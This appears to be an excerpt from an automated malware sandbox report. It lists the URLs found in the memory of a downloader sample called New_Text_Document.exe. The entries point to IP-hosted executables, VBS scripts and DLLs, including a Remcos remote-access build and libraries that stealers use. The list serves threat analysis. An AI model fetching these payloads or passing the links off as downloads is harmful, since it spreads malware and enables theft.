                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://93.39.115.176:16969/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://93.39.178.18:3575/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://93.41.154.145:56549/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://93.41.157.53:31898/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://93.41.227.233:22646/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://93.43.212.140:13864/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://93.47.168.80:12767/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://93.48.151.126:7004/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://93.49.96.12:55073/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://93.57.35.40:51789/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://93.67.83.49:40954/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://93.86.63.20:3272/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://93.91.152.226:26318/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.142.138.111/software/Build-1S.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.142.138.111/software/Build1.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.142.138.111/software/Build1.zip
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.142.138.111/software/Build2.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.142.138.111/software/Build2.zip
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.142.138.111/software/SecHorST.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.142.138.111/software/bld_3.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.142.138.111/software/bld_4.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.142.138.111/software/ngrok.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.142.138.111/software/remcos_a2.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.142.138.111/software/testing.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.142.138.111/software/tst2.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.142.138.114/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/freebl3.dll
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.142.138.114/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/mozglue.dll
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.142.138.114/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/msvcp140.dll
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.142.138.114/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/nss3.dll
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.142.138.114/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/softokn3.dll
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.142.138.114/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/sqlite3.dll
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.142.138.114/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/vcruntime140.dll
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.142.138.20/version_s/upd.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.156.253.236/HTMLcvdesiii.dOC
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.156.253.236/HTMLincache.doc
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.156.253.236/adyfriday.vbs
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000035DA000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.156.253.236/jajajjajapapapappanananan.vbs
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.156.253.236/lllllillilililiil.vbs
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.156.253.236/westartagain.vbs
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.183.43.227:63030/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.226.32.206:9740/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.226.98.236:29392/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.239.85.31:59790/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.253.15.141:64172/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.28.123.145:47868/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.41.60.179:2732/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.46.235.17:24502/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.53.116.104:54217/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.53.120.109/dusers.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.63.115.67:28714/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.74.128.50:65074/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.107.2.143:48570/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.158.69.35:16506/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.170.113.227:32493/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.214.24.244/1337/Rrobknnz-TORRENTOLD.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.214.24.244/1337/TORRENTOLD-1.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.214.24.244/1337/Wjgqesf-OLD-2.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.214.24.244/1337/Wjgqesf-OLD-3.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.214.24.244/FreeApps/Dzodhr-FREE-2.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.214.24.244/FreeApps/Dzodhr-FREE-3.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.214.24.244/FreeApps/Rrobknnz-FREEAPPS.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.214.24.244/HEXO-CLIENTS/Rljanzfv-1.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.214.24.244/HEXO-CLIENTS/Rljanzfv-2.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.214.24.244/HEXO-SOFTWARE/HEXO-SOFTWARE-1.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.214.24.244/HEXO-SOFTWARE/Sazae-1.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.214.24.244/HEXO-SOFTWARE/Sazae-2.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.214.24.244/TORRENT-SPAM/Kbdxdxwj-1.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.214.24.244/TORRENT-SPAM/Kbdxdxwj-2.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.214.24.244/TPB-2-Links/Ntprfgupx-2.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.214.24.244/TPB-2-Links/TPB-1.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.214.24.244/TPBActivetor/Mfceum-4.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.214.24.244/TPBActivetor/Update.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.214.24.244/Z2KNEW/Ivnut-Z2K-2.exe
